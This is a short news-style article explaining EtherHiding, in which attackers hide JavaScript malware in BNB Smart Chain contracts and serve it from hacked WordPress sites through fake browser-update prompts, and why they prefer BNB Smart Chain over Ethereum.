Understanding EtherHiding: The New Threat Vector
Security experts at 0xScope and CertiK have observed a rising trend among cybercriminals utilizing BNB Smart Chain contracts. Despite its name, EtherHiding, a technique for concealing malicious code within blockchain smart contracts, is primarily associated with Binance’s BNB Smart Chain rather than Ethereum. This strategy is favored by hackers due to its cost-effectiveness and perceived lower security.
BNB Smart Chain’s Appeal to Cybercriminals
BNB Smart Chain’s affordability is a significant factor attracting cybercriminals. According to Joe Green, a security researcher at CertiK, the lower handling fees on BNB Smart Chain, in comparison to Ethereum, make it an attractive choice for executing EtherHiding attacks. The network stability and speed remain consistent, and the inexpensive JavaScript Payload updates result in minimal financial pressure.
Execution of EtherHiding Attacks
EtherHiding attacks commence with hackers compromising WordPress websites. Malicious code is injected, retrieving partial payloads concealed within Binance smart contracts. The website’s front end is replaced with a counterfeit update browser prompt. When clicked, this prompt pulls the JavaScript payload from the Binance blockchain, allowing hackers to distribute malware disguised as browser updates. To avoid detection, hackers frequently alter malware payloads and update website domains, ensuring users unknowingly download fresh malware.
Factors Influencing the Choice of BNB Smart Chain
Security researchers at Web3 analytics firm 0xScope speculate that the preference for BNB Smart Chain could be attributed to heightened security scrutiny on Ethereum. Injecting malicious code using Ethereum carries higher risks of detection due to systems like Infura’s IP address tracking for MetaMask transactions. By utilizing BNB Smart Chain, hackers can operate with reduced scrutiny and continue their malicious activities.
Complexity of EtherHiding Attacks
The sophistication of EtherHiding attacks is evident in the constant updates made across 18 identified hacker domains. Hackers strategically link key addresses to entities like NFT marketplace OpenSea users and Copper custody services. This intricate web of connections, coupled with daily payload updates, makes EtherHiding incredibly challenging to detect and halt, making it a potent threat in the realm of cybersecurity.